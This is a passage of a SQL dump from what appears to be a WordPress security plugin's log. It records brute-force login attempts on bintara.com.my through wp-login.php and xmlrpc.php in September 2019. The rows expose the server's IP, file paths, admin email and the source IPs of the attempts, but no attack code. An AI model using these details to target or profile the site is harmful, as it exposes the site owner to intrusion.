18:18:31',17738848,19229528,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(23905,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"57688\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX57Ht7nxogXZmwWoWG@7QAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568570142.5884\";s:12:\"REQUEST_TIME\";s:10:\"1568570142\";}}','notice','2019-09-15 17:55:45','2019-09-15 17:55:43',18255184,19554792,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(23904,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"56790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX57F97nxogXZmwWoWG@6wAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568570135.2773\";s:12:\"REQUEST_TIME\";s:10:\"1568570135\";}}','notice','2019-09-15 17:55:36','2019-09-15 17:55:35',17738392,19229344,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(23903,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"59458\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX54CuesTgPVjZVPWmsjTwAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568569354.618\";s:12:\"REQUEST_TIME\";s:10:\"1568569354\";}}','notice','2019-09-15 17:42:36','2019-09-15 17:42:34',18255720,19555280,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(23902,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"58996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX54B97nxogXZmwWoWG9zQAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568569351.1161\";s:12:\"REQUEST_TIME\";s:10:\"1568569351\";}}','notice','2019-09-15 17:42:32','2019-09-15 17:42:31',17738064,19227936,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(23901,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"13.232.249.134\";s:11:\"REMOTE_PORT\";s:5:\"58116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX53h97nxogXZmwWoWG9rQAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568569224.2514\";s:12:\"REQUEST_TIME\";s:10:\"1568569224\";}}','notice','2019-09-15 17:40:29','2019-09-15 17:40:24',17739320,19230464,'https://bintara.com.my/wp-login.php',1,0,'13.232.249.134'),(23900,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"33818\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5yt97nxogXZmwWoWG7yAAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568567992.541\";s:12:\"REQUEST_TIME\";s:10:\"1568567992\";}}','notice','2019-09-15 17:19:54','2019-09-15 17:19:52',18254704,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.78.134'),(23898,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"45736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5v5d7nxogXZmwWoWG6TQAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568567269.9753\";s:12:\"REQUEST_TIME\";s:10:\"1568567269\";}}','notice','2019-09-15 17:07:51','2019-09-15 17:07:50',18254488,19554112,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(23899,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"32828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5yseesTgPVjZVPWmsioQAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568567985.4141\";s:12:\"REQUEST_TIME\";s:10:\"1568567985\";}}','notice','2019-09-15 17:19:49','2019-09-15 17:19:45',17739752,19230088,'https://bintara.com.my/wp-login.php',1,0,'104.248.78.134'),(23897,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"45030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5v4d7nxogXZmwWoWG6TAAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568567265.5643\";s:12:\"REQUEST_TIME\";s:10:\"1568567265\";}}','notice','2019-09-15 17:07:47','2019-09-15 